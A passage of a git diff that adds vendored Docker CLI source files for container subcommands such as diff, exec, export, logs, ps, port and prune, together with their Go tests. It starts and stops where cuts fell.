"github.com/docker/docker/pkg/archive" + "github.com/spf13/cobra" +) + +type diffOptions struct { + container string +} + +// NewDiffCommand creates a new cobra.Command for `docker diff` +func NewDiffCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts diffOptions + + return &cobra.Command{ + Use: "diff CONTAINER", + Short: "Inspect changes on a container's filesystem", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.container = args[0] + return runDiff(dockerCli, &opts) + }, + } +} + +func runDiff(dockerCli *command.DockerCli, opts 
*diffOptions) error { + if opts.container == "" { + return fmt.Errorf("Container name cannot be empty") + } + ctx := context.Background() + + changes, err := dockerCli.Client().ContainerDiff(ctx, opts.container) + if err != nil { + return err + } + + for _, change := range changes { + var kind string + switch change.Kind { + case archive.ChangeModify: + kind = "C" + case archive.ChangeAdd: + kind = "A" + case archive.ChangeDelete: + kind = "D" + } + fmt.Fprintf(dockerCli.Out(), "%s %s\n", kind, change.Path) + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/exec.go b/vendor/github.com/docker/docker/cli/command/container/exec.go new file mode 100644 index 0000000000..f0381494e2 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/exec.go @@ -0,0 +1,207 @@ +package container + +import ( + "fmt" + "io" + + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + apiclient "github.com/docker/docker/client" + options "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/promise" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/spf13/cobra" +) + +type execOptions struct { + detachKeys string + interactive bool + tty bool + detach bool + user string + privileged bool + env *options.ListOpts +} + +func newExecOptions() *execOptions { + var values []string + return &execOptions{ + env: options.NewListOptsRef(&values, runconfigopts.ValidateEnv), + } +} + +// NewExecCommand creats a new cobra.Command for `docker exec` +func NewExecCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := newExecOptions() + + cmd := &cobra.Command{ + Use: "exec [OPTIONS] CONTAINER COMMAND [ARG...]", + Short: "Run a command in a running container", + Args: cli.RequiresMinArgs(2), + RunE: func(cmd *cobra.Command, args []string) error { + container := args[0] + execCmd := args[1:] + 
return runExec(dockerCli, opts, container, execCmd) + }, + } + + flags := cmd.Flags() + flags.SetInterspersed(false) + + flags.StringVarP(&opts.detachKeys, "detach-keys", "", "", "Override the key sequence for detaching a container") + flags.BoolVarP(&opts.interactive, "interactive", "i", false, "Keep STDIN open even if not attached") + flags.BoolVarP(&opts.tty, "tty", "t", false, "Allocate a pseudo-TTY") + flags.BoolVarP(&opts.detach, "detach", "d", false, "Detached mode: run command in the background") + flags.StringVarP(&opts.user, "user", "u", "", "Username or UID (format: [:])") + flags.BoolVarP(&opts.privileged, "privileged", "", false, "Give extended privileges to the command") + flags.VarP(opts.env, "env", "e", "Set environment variables") + flags.SetAnnotation("env", "version", []string{"1.25"}) + + return cmd +} + +func runExec(dockerCli *command.DockerCli, opts *execOptions, container string, execCmd []string) error { + execConfig, err := parseExec(opts, execCmd) + // just in case the ParseExec does not exit + if container == "" || err != nil { + return cli.StatusError{StatusCode: 1} + } + + if opts.detachKeys != "" { + dockerCli.ConfigFile().DetachKeys = opts.detachKeys + } + + // Send client escape keys + execConfig.DetachKeys = dockerCli.ConfigFile().DetachKeys + + ctx := context.Background() + client := dockerCli.Client() + + response, err := client.ContainerExecCreate(ctx, container, *execConfig) + if err != nil { + return err + } + + execID := response.ID + if execID == "" { + fmt.Fprintf(dockerCli.Out(), "exec ID empty") + return nil + } + + //Temp struct for execStart so that we don't need to transfer all the execConfig + if !execConfig.Detach { + if err := dockerCli.In().CheckTty(execConfig.AttachStdin, execConfig.Tty); err != nil { + return err + } + } else { + execStartCheck := types.ExecStartCheck{ + Detach: execConfig.Detach, + Tty: execConfig.Tty, + } + + if err := client.ContainerExecStart(ctx, execID, execStartCheck); err != nil { + 
return err + } + // For now don't print this - wait for when we support exec wait() + // fmt.Fprintf(dockerCli.Out(), "%s\n", execID) + return nil + } + + // Interactive exec requested. + var ( + out, stderr io.Writer + in io.ReadCloser + errCh chan error + ) + + if execConfig.AttachStdin { + in = dockerCli.In() + } + if execConfig.AttachStdout { + out = dockerCli.Out() + } + if execConfig.AttachStderr { + if execConfig.Tty { + stderr = dockerCli.Out() + } else { + stderr = dockerCli.Err() + } + } + + resp, err := client.ContainerExecAttach(ctx, execID, *execConfig) + if err != nil { + return err + } + defer resp.Close() + errCh = promise.Go(func() error { + return holdHijackedConnection(ctx, dockerCli, execConfig.Tty, in, out, stderr, resp) + }) + + if execConfig.Tty && dockerCli.In().IsTerminal() { + if err := MonitorTtySize(ctx, dockerCli, execID, true); err != nil { + fmt.Fprintf(dockerCli.Err(), "Error monitoring TTY size: %s\n", err) + } + } + + if err := <-errCh; err != nil { + logrus.Debugf("Error hijack: %s", err) + return err + } + + var status int + if _, status, err = getExecExitCode(ctx, client, execID); err != nil { + return err + } + + if status != 0 { + return cli.StatusError{StatusCode: status} + } + + return nil +} + +// getExecExitCode perform an inspect on the exec command. It returns +// the running state and the exit code. +func getExecExitCode(ctx context.Context, client apiclient.ContainerAPIClient, execID string) (bool, int, error) { + resp, err := client.ContainerExecInspect(ctx, execID) + if err != nil { + // If we can't connect, then the daemon probably died. + if !apiclient.IsErrConnectionFailed(err) { + return false, -1, err + } + return false, -1, nil + } + + return resp.Running, resp.ExitCode, nil +} + +// parseExec parses the specified args for the specified command and generates +// an ExecConfig from it. 
+func parseExec(opts *execOptions, execCmd []string) (*types.ExecConfig, error) { + execConfig := &types.ExecConfig{ + User: opts.user, + Privileged: opts.privileged, + Tty: opts.tty, + Cmd: execCmd, + Detach: opts.detach, + } + + // If -d is not set, attach to everything by default + if !opts.detach { + execConfig.AttachStdout = true + execConfig.AttachStderr = true + if opts.interactive { + execConfig.AttachStdin = true + } + } + + if opts.env != nil { + execConfig.Env = opts.env.GetAll() + } + + return execConfig, nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/exec_test.go b/vendor/github.com/docker/docker/cli/command/container/exec_test.go new file mode 100644 index 0000000000..baeeaf1904 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/exec_test.go @@ -0,0 +1,116 @@ +package container + +import ( + "testing" + + "github.com/docker/docker/api/types" +) + +type arguments struct { + options execOptions + execCmd []string +} + +func TestParseExec(t *testing.T) { + valids := map[*arguments]*types.ExecConfig{ + &arguments{ + execCmd: []string{"command"}, + }: { + Cmd: []string{"command"}, + AttachStdout: true, + AttachStderr: true, + }, + &arguments{ + execCmd: []string{"command1", "command2"}, + }: { + Cmd: []string{"command1", "command2"}, + AttachStdout: true, + AttachStderr: true, + }, + &arguments{ + options: execOptions{ + interactive: true, + tty: true, + user: "uid", + }, + execCmd: []string{"command"}, + }: { + User: "uid", + AttachStdin: true, + AttachStdout: true, + AttachStderr: true, + Tty: true, + Cmd: []string{"command"}, + }, + &arguments{ + options: execOptions{ + detach: true, + }, + execCmd: []string{"command"}, + }: { + AttachStdin: false, + AttachStdout: false, + AttachStderr: false, + Detach: true, + Cmd: []string{"command"}, + }, + &arguments{ + options: execOptions{ + tty: true, + interactive: true, + detach: true, + }, + execCmd: []string{"command"}, + }: { + AttachStdin: false, + 
AttachStdout: false, + AttachStderr: false, + Detach: true, + Tty: true, + Cmd: []string{"command"}, + }, + } + + for valid, expectedExecConfig := range valids { + execConfig, err := parseExec(&valid.options, valid.execCmd) + if err != nil { + t.Fatal(err) + } + if !compareExecConfig(expectedExecConfig, execConfig) { + t.Fatalf("Expected [%v] for %v, got [%v]", expectedExecConfig, valid, execConfig) + } + } +} + +func compareExecConfig(config1 *types.ExecConfig, config2 *types.ExecConfig) bool { + if config1.AttachStderr != config2.AttachStderr { + return false + } + if config1.AttachStdin != config2.AttachStdin { + return false + } + if config1.AttachStdout != config2.AttachStdout { + return false + } + if config1.Detach != config2.Detach { + return false + } + if config1.Privileged != config2.Privileged { + return false + } + if config1.Tty != config2.Tty { + return false + } + if config1.User != config2.User { + return false + } + if len(config1.Cmd) != len(config2.Cmd) { + return false + } + for index, value := range config1.Cmd { + if value != config2.Cmd[index] { + return false + } + } + return true +} diff --git a/vendor/github.com/docker/docker/cli/command/container/export.go b/vendor/github.com/docker/docker/cli/command/container/export.go new file mode 100644 index 0000000000..8fa2e5d77e --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/export.go @@ -0,0 +1,59 @@ +package container + +import ( + "errors" + "io" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type exportOptions struct { + container string + output string +} + +// NewExportCommand creates a new `docker export` command +func NewExportCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts exportOptions + + cmd := &cobra.Command{ + Use: "export [OPTIONS] CONTAINER", + Short: "Export a container's filesystem as a tar archive", + Args: cli.ExactArgs(1), + RunE: func(cmd 
*cobra.Command, args []string) error { + opts.container = args[0] + return runExport(dockerCli, opts) + }, + } + + flags := cmd.Flags() + + flags.StringVarP(&opts.output, "output", "o", "", "Write to a file, instead of STDOUT") + + return cmd +} + +func runExport(dockerCli *command.DockerCli, opts exportOptions) error { + if opts.output == "" && dockerCli.Out().IsTerminal() { + return errors.New("Cowardly refusing to save to a terminal. Use the -o flag or redirect.") + } + + clnt := dockerCli.Client() + + responseBody, err := clnt.ContainerExport(context.Background(), opts.container) + if err != nil { + return err + } + defer responseBody.Close() + + if opts.output == "" { + _, err := io.Copy(dockerCli.Out(), responseBody) + return err + } + + return command.CopyToFile(opts.output, responseBody) +} diff --git a/vendor/github.com/docker/docker/cli/command/container/hijack.go b/vendor/github.com/docker/docker/cli/command/container/hijack.go new file mode 100644 index 0000000000..ca136f0e43 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/hijack.go @@ -0,0 +1,116 @@ +package container + +import ( + "io" + "runtime" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/stdcopy" + "golang.org/x/net/context" +) + +// holdHijackedConnection handles copying input to and output from streams to the +// connection +func holdHijackedConnection(ctx context.Context, streams command.Streams, tty bool, inputStream io.ReadCloser, outputStream, errorStream io.Writer, resp types.HijackedResponse) error { + var ( + err error + restoreOnce sync.Once + ) + if inputStream != nil && tty { + if err := setRawTerminal(streams); err != nil { + return err + } + defer func() { + restoreOnce.Do(func() { + restoreTerminal(streams, inputStream) + }) + }() + } + + receiveStdout := make(chan error, 1) + if outputStream != nil || errorStream != nil { + go func() { + // When TTY 
is ON, use regular copy + if tty && outputStream != nil { + _, err = io.Copy(outputStream, resp.Reader) + // we should restore the terminal as soon as possible once connection end + // so any following print messages will be in normal type. + if inputStream != nil { + restoreOnce.Do(func() { + restoreTerminal(streams, inputStream) + }) + } + } else { + _, err = stdcopy.StdCopy(outputStream, errorStream, resp.Reader) + } + + logrus.Debug("[hijack] End of stdout") + receiveStdout <- err + }() + } + + stdinDone := make(chan struct{}) + go func() { + if inputStream != nil { + io.Copy(resp.Conn, inputStream) + // we should restore the terminal as soon as possible once connection end + // so any following print messages will be in normal type. + if tty { + restoreOnce.Do(func() { + restoreTerminal(streams, inputStream) + }) + } + logrus.Debug("[hijack] End of stdin") + } + + if err := resp.CloseWrite(); err != nil { + logrus.Debugf("Couldn't send EOF: %s", err) + } + close(stdinDone) + }() + + select { + case err := <-receiveStdout: + if err != nil { + logrus.Debugf("Error receiveStdout: %s", err) + return err + } + case <-stdinDone: + if outputStream != nil || errorStream != nil { + select { + case err := <-receiveStdout: + if err != nil { + logrus.Debugf("Error receiveStdout: %s", err) + return err + } + case <-ctx.Done(): + } + } + case <-ctx.Done(): + } + + return nil +} + +func setRawTerminal(streams command.Streams) error { + if err := streams.In().SetRawTerminal(); err != nil { + return err + } + return streams.Out().SetRawTerminal() +} + +func restoreTerminal(streams command.Streams, in io.Closer) error { + streams.In().RestoreTerminal() + streams.Out().RestoreTerminal() + // WARNING: DO NOT REMOVE THE OS CHECK !!! + // For some reason this Close call blocks on darwin.. + // As the client exists right after, simply discard the close + // until we find a better solution. 
+ if in != nil && runtime.GOOS != "darwin" { + return in.Close() + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/inspect.go b/vendor/github.com/docker/docker/cli/command/container/inspect.go new file mode 100644 index 0000000000..08a8d244df --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/inspect.go @@ -0,0 +1,47 @@ +package container + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/inspect" + "github.com/spf13/cobra" +) + +type inspectOptions struct { + format string + size bool + refs []string +} + +// newInspectCommand creates a new cobra.Command for `docker container inspect` +func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts inspectOptions + + cmd := &cobra.Command{ + Use: "inspect [OPTIONS] CONTAINER [CONTAINER...]", + Short: "Display detailed information on one or more containers", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.refs = args + return runInspect(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") + flags.BoolVarP(&opts.size, "size", "s", false, "Display total file sizes") + + return cmd +} + +func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + getRefFunc := func(ref string) (interface{}, []byte, error) { + return client.ContainerInspectWithRaw(ctx, ref, opts.size) + } + return inspect.Inspect(dockerCli.Out(), opts.refs, opts.format, getRefFunc) +} diff --git a/vendor/github.com/docker/docker/cli/command/container/kill.go b/vendor/github.com/docker/docker/cli/command/container/kill.go new file mode 100644 index 0000000000..6da91a40e3 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/kill.go 
@@ -0,0 +1,56 @@ +package container + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type killOptions struct { + signal string + + containers []string +} + +// NewKillCommand creates a new cobra.Command for `docker kill` +func NewKillCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts killOptions + + cmd := &cobra.Command{ + Use: "kill [OPTIONS] CONTAINER [CONTAINER...]", + Short: "Kill one or more running containers", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.containers = args + return runKill(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.StringVarP(&opts.signal, "signal", "s", "KILL", "Signal to send to the container") + return cmd +} + +func runKill(dockerCli *command.DockerCli, opts *killOptions) error { + var errs []string + ctx := context.Background() + errChan := parallelOperation(ctx, opts.containers, func(ctx context.Context, container string) error { + return dockerCli.Client().ContainerKill(ctx, container, opts.signal) + }) + for _, name := range opts.containers { + if err := <-errChan; err != nil { + errs = append(errs, err.Error()) + } else { + fmt.Fprintf(dockerCli.Out(), "%s\n", name) + } + } + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/list.go b/vendor/github.com/docker/docker/cli/command/container/list.go new file mode 100644 index 0000000000..5bbf41966d --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/list.go @@ -0,0 +1,141 @@ +package container + +import ( + "io/ioutil" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/formatter" + "github.com/docker/docker/opts" + 
"github.com/docker/docker/utils/templates" + "github.com/spf13/cobra" +) + +type psOptions struct { + quiet bool + size bool + all bool + noTrunc bool + nLatest bool + last int + format string + filter opts.FilterOpt +} + +// NewPsCommand creates a new cobra.Command for `docker ps` +func NewPsCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := psOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "ps [OPTIONS]", + Short: "List containers", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runPs(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + + flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display numeric IDs") + flags.BoolVarP(&opts.size, "size", "s", false, "Display total file sizes") + flags.BoolVarP(&opts.all, "all", "a", false, "Show all containers (default shows just running)") + flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output") + flags.BoolVarP(&opts.nLatest, "latest", "l", false, "Show the latest created container (includes all states)") + flags.IntVarP(&opts.last, "last", "n", -1, "Show n last created containers (includes all states)") + flags.StringVarP(&opts.format, "format", "", "", "Pretty-print containers using a Go template") + flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") + + return cmd +} + +func newListCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := *NewPsCommand(dockerCli) + cmd.Aliases = []string{"ps", "list"} + cmd.Use = "ls [OPTIONS]" + return &cmd +} + +// listOptionsProcessor is used to set any container list options which may only +// be embedded in the format template. +// This is passed directly into tmpl.Execute in order to allow the preprocessor +// to set any list options that were not provided by flags (e.g. `.Size`). +// It is using a `map[string]bool` so that unknown fields passed into the +// template format do not cause errors. 
These errors will get picked up when +// running through the actual template processor. +type listOptionsProcessor map[string]bool + +// Size sets the size of the map when called by a template execution. +func (o listOptionsProcessor) Size() bool { + o["size"] = true + return true +} + +// Label is needed here as it allows the correct pre-processing +// because Label() is a method with arguments +func (o listOptionsProcessor) Label(name string) string { + return "" +} + +func buildContainerListOptions(opts *psOptions) (*types.ContainerListOptions, error) { + options := &types.ContainerListOptions{ + All: opts.all, + Limit: opts.last, + Size: opts.size, + Filters: opts.filter.Value(), + } + + if opts.nLatest && opts.last == -1 { + options.Limit = 1 + } + + tmpl, err := templates.Parse(opts.format) + + if err != nil { + return nil, err + } + + optionsProcessor := listOptionsProcessor{} + // This shouldn't error out but swallowing the error makes it harder + // to track down if preProcessor issues come up. 
Ref #24696 + if err := tmpl.Execute(ioutil.Discard, optionsProcessor); err != nil { + return nil, err + } + // At the moment all we need is to capture .Size for preprocessor + options.Size = opts.size || optionsProcessor["size"] + + return options, nil +} + +func runPs(dockerCli *command.DockerCli, opts *psOptions) error { + ctx := context.Background() + + listOptions, err := buildContainerListOptions(opts) + if err != nil { + return err + } + + containers, err := dockerCli.Client().ContainerList(ctx, *listOptions) + if err != nil { + return err + } + + format := opts.format + if len(format) == 0 { + if len(dockerCli.ConfigFile().PsFormat) > 0 && !opts.quiet { + format = dockerCli.ConfigFile().PsFormat + } else { + format = formatter.TableFormatKey + } + } + + containerCtx := formatter.Context{ + Output: dockerCli.Out(), + Format: formatter.NewContainerFormat(format, opts.quiet, listOptions.Size), + Trunc: !opts.noTrunc, + } + return formatter.ContainerWrite(containerCtx, containers) +} diff --git a/vendor/github.com/docker/docker/cli/command/container/logs.go b/vendor/github.com/docker/docker/cli/command/container/logs.go new file mode 100644 index 0000000000..3a37cedf43 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/logs.go @@ -0,0 +1,87 @@ +package container + +import ( + "fmt" + "io" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/stdcopy" + "github.com/spf13/cobra" +) + +var validDrivers = map[string]bool{ + "json-file": true, + "journald": true, +} + +type logsOptions struct { + follow bool + since string + timestamps bool + details bool + tail string + + container string +} + +// NewLogsCommand creates a new cobra.Command for `docker logs` +func NewLogsCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts logsOptions + + cmd := &cobra.Command{ + Use: "logs [OPTIONS] CONTAINER", + Short: 
"Fetch the logs of a container", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.container = args[0] + return runLogs(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.follow, "follow", "f", false, "Follow log output") + flags.StringVar(&opts.since, "since", "", "Show logs since timestamp") + flags.BoolVarP(&opts.timestamps, "timestamps", "t", false, "Show timestamps") + flags.BoolVar(&opts.details, "details", false, "Show extra details provided to logs") + flags.StringVar(&opts.tail, "tail", "all", "Number of lines to show from the end of the logs") + return cmd +} + +func runLogs(dockerCli *command.DockerCli, opts *logsOptions) error { + ctx := context.Background() + + c, err := dockerCli.Client().ContainerInspect(ctx, opts.container) + if err != nil { + return err + } + + if !validDrivers[c.HostConfig.LogConfig.Type] { + return fmt.Errorf("\"logs\" command is supported only for \"json-file\" and \"journald\" logging drivers (got: %s)", c.HostConfig.LogConfig.Type) + } + + options := types.ContainerLogsOptions{ + ShowStdout: true, + ShowStderr: true, + Since: opts.since, + Timestamps: opts.timestamps, + Follow: opts.follow, + Tail: opts.tail, + Details: opts.details, + } + responseBody, err := dockerCli.Client().ContainerLogs(ctx, opts.container, options) + if err != nil { + return err + } + defer responseBody.Close() + + if c.Config.Tty { + _, err = io.Copy(dockerCli.Out(), responseBody) + } else { + _, err = stdcopy.StdCopy(dockerCli.Out(), dockerCli.Err(), responseBody) + } + return err +} diff --git a/vendor/github.com/docker/docker/cli/command/container/pause.go b/vendor/github.com/docker/docker/cli/command/container/pause.go new file mode 100644 index 0000000000..6817cf60eb --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/pause.go @@ -0,0 +1,49 @@ +package container + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + 
"github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type pauseOptions struct { + containers []string +} + +// NewPauseCommand creates a new cobra.Command for `docker pause` +func NewPauseCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts pauseOptions + + return &cobra.Command{ + Use: "pause CONTAINER [CONTAINER...]", + Short: "Pause all processes within one or more containers", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.containers = args + return runPause(dockerCli, &opts) + }, + } +} + +func runPause(dockerCli *command.DockerCli, opts *pauseOptions) error { + ctx := context.Background() + + var errs []string + errChan := parallelOperation(ctx, opts.containers, dockerCli.Client().ContainerPause) + for _, container := range opts.containers { + if err := <-errChan; err != nil { + errs = append(errs, err.Error()) + } else { + fmt.Fprintf(dockerCli.Out(), "%s\n", container) + } + } + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/port.go b/vendor/github.com/docker/docker/cli/command/container/port.go new file mode 100644 index 0000000000..ea15290145 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/port.go @@ -0,0 +1,78 @@ +package container + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/go-connections/nat" + "github.com/spf13/cobra" +) + +type portOptions struct { + container string + + port string +} + +// NewPortCommand creates a new cobra.Command for `docker port` +func NewPortCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts portOptions + + cmd := &cobra.Command{ + Use: "port CONTAINER [PRIVATE_PORT[/PROTO]]", + Short: "List port mappings or a specific mapping for the container", + Args: cli.RequiresRangeArgs(1, 2), + 
RunE: func(cmd *cobra.Command, args []string) error { + opts.container = args[0] + if len(args) > 1 { + opts.port = args[1] + } + return runPort(dockerCli, &opts) + }, + } + return cmd +} + +func runPort(dockerCli *command.DockerCli, opts *portOptions) error { + ctx := context.Background() + + c, err := dockerCli.Client().ContainerInspect(ctx, opts.container) + if err != nil { + return err + } + + if opts.port != "" { + port := opts.port + proto := "tcp" + parts := strings.SplitN(port, "/", 2) + + if len(parts) == 2 && len(parts[1]) != 0 { + port = parts[0] + proto = parts[1] + } + natPort := port + "/" + proto + newP, err := nat.NewPort(proto, port) + if err != nil { + return err + } + if frontends, exists := c.NetworkSettings.Ports[newP]; exists && frontends != nil { + for _, frontend := range frontends { + fmt.Fprintf(dockerCli.Out(), "%s:%s\n", frontend.HostIP, frontend.HostPort) + } + return nil + } + return fmt.Errorf("Error: No public port '%s' published for %s", natPort, opts.container) + } + + for from, frontends := range c.NetworkSettings.Ports { + for _, frontend := range frontends { + fmt.Fprintf(dockerCli.Out(), "%s -> %s:%s\n", from, frontend.HostIP, frontend.HostPort) + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/prune.go b/vendor/github.com/docker/docker/cli/command/container/prune.go new file mode 100644 index 0000000000..064f4c08e0 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/prune.go @@ -0,0 +1,75 @@ +package container + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + units "github.com/docker/go-units" + "github.com/spf13/cobra" +) + +type pruneOptions struct { + force bool +} + +// NewPruneCommand returns a new cobra prune command for containers +func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts pruneOptions + + cmd := 
&cobra.Command{ + Use: "prune [OPTIONS]", + Short: "Remove all stopped containers", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + spaceReclaimed, output, err := runPrune(dockerCli, opts) + if err != nil { + return err + } + if output != "" { + fmt.Fprintln(dockerCli.Out(), output) + } + fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed))) + return nil + }, + Tags: map[string]string{"version": "1.25"}, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation") + + return cmd +} + +const warning = `WARNING! This will remove all stopped containers. +Are you sure you want to continue?` + +func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (spaceReclaimed uint64, output string, err error) { + if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) { + return + } + + report, err := dockerCli.Client().ContainersPrune(context.Background(), filters.Args{}) + if err != nil { + return + } + + if len(report.ContainersDeleted) > 0 { + output = "Deleted Containers:\n" + for _, id := range report.ContainersDeleted { + output += id + "\n" + } + spaceReclaimed = report.SpaceReclaimed + } + + return +} + +// RunPrune calls the Container Prune API +// This returns the amount of space reclaimed and a detailed output string +func RunPrune(dockerCli *command.DockerCli) (uint64, string, error) { + return runPrune(dockerCli, pruneOptions{force: true}) +} diff --git a/vendor/github.com/docker/docker/cli/command/container/ps_test.go b/vendor/github.com/docker/docker/cli/command/container/ps_test.go new file mode 100644 index 0000000000..62b0545274 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/ps_test.go @@ -0,0 +1,118 @@ +package container + +import ( + "testing" + + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/testutil/assert" +) + +func 
TestBuildContainerListOptions(t *testing.T) { + filters := opts.NewFilterOpt() + assert.NilError(t, filters.Set("foo=bar")) + assert.NilError(t, filters.Set("baz=foo")) + + contexts := []struct { + psOpts *psOptions + expectedAll bool + expectedSize bool + expectedLimit int + expectedFilters map[string]string + }{ + { + psOpts: &psOptions{ + all: true, + size: true, + last: 5, + filter: filters, + }, + expectedAll: true, + expectedSize: true, + expectedLimit: 5, + expectedFilters: map[string]string{ + "foo": "bar", + "baz": "foo", + }, + }, + { + psOpts: &psOptions{ + all: true, + size: true, + last: -1, + nLatest: true, + }, + expectedAll: true, + expectedSize: true, + expectedLimit: 1, + expectedFilters: make(map[string]string), + }, + { + psOpts: &psOptions{ + all: true, + size: false, + last: 5, + filter: filters, + // With .Size, size should be true + format: "{{.Size}}", + }, + expectedAll: true, + expectedSize: true, + expectedLimit: 5, + expectedFilters: map[string]string{ + "foo": "bar", + "baz": "foo", + }, + }, + { + psOpts: &psOptions{ + all: true, + size: false, + last: 5, + filter: filters, + // With .Size, size should be true + format: "{{.Size}} {{.CreatedAt}} {{.Networks}}", + }, + expectedAll: true, + expectedSize: true, + expectedLimit: 5, + expectedFilters: map[string]string{ + "foo": "bar", + "baz": "foo", + }, + }, + { + psOpts: &psOptions{ + all: true, + size: false, + last: 5, + filter: filters, + // Without .Size, size should be false + format: "{{.CreatedAt}} {{.Networks}}", + }, + expectedAll: true, + expectedSize: false, + expectedLimit: 5, + expectedFilters: map[string]string{ + "foo": "bar", + "baz": "foo", + }, + }, + } + + for _, c := range contexts { + options, err := buildContainerListOptions(c.psOpts) + assert.NilError(t, err) + + assert.Equal(t, c.expectedAll, options.All) + assert.Equal(t, c.expectedSize, options.Size) + assert.Equal(t, c.expectedLimit, options.Limit) + assert.Equal(t, options.Filters.Len(), 
len(c.expectedFilters)) + + for k, v := range c.expectedFilters { + f := options.Filters + if !f.ExactMatch(k, v) { + t.Fatalf("Expected filter with key %s to be %s but got %s", k, v, f.Get(k)) + } + } + } +} diff --git a/vendor/github.com/docker/docker/cli/command/container/rename.go b/vendor/github.com/docker/docker/cli/command/container/rename.go new file mode 100644 index 0000000000..346fb7b3b9 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/rename.go @@ -0,0 +1,51 @@ +package container + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type renameOptions struct { + oldName string + newName string +} + +// NewRenameCommand creates a new cobra.Command for `docker rename` +func NewRenameCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts renameOptions + + cmd := &cobra.Command{ + Use: "rename CONTAINER NEW_NAME", + Short: "Rename a container", + Args: cli.ExactArgs(2), + RunE: func(cmd *cobra.Command, args []string) error { + opts.oldName = args[0] + opts.newName = args[1] + return runRename(dockerCli, &opts) + }, + } + return cmd +} + +func runRename(dockerCli *command.DockerCli, opts *renameOptions) error { + ctx := context.Background() + + oldName := 